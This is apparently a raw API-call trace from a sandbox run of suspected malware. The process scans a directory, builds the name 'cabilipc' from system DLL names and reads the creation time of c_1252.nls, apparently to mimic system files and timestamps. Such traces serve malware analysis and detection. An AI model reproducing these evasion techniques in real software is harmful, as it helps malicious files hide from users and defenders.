CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.565] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.565] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.566] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.566] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] StrChrA (lpStart="cabinet.dll", wMatch=0x2e) returned=".dll" [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.567] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.567] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.568] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.568] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.569] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.569] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.569] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.569] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.569] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.569] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.569] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.569] StrChrA (lpStart="Clipc.dll", wMatch=0x2e) returned=".dll" [0206.569] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.569] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.569] FindClose (in: hFindFile=0x59e830 | out: hFindFile=0x59e830) returned 1 [0206.569] lstrlenA (lpString="cabilipc") returned 8 [0206.569] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\c_1252.nls", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x20 [0206.569] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\c_1252.nls", lpDst=0x23c8710, nSize=0x20 | out: lpDst="C:\\Windows\\system32\\c_1252.nls") returned 0x1f [0206.569] CreateFileA (lpFileName="C:\\Windows\\system32\\c_1252.nls" (normalized: "c:\\windows\\system32\\c_1252.nls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0206.569] GetFileTime (in: hFile=0x178, lpCreationTime=0x1eafeac, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x1eafeac*(dwLowDateTime=0x9656d311, dwHighDateTime=0x1d0baff), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0206.569] CloseHandle 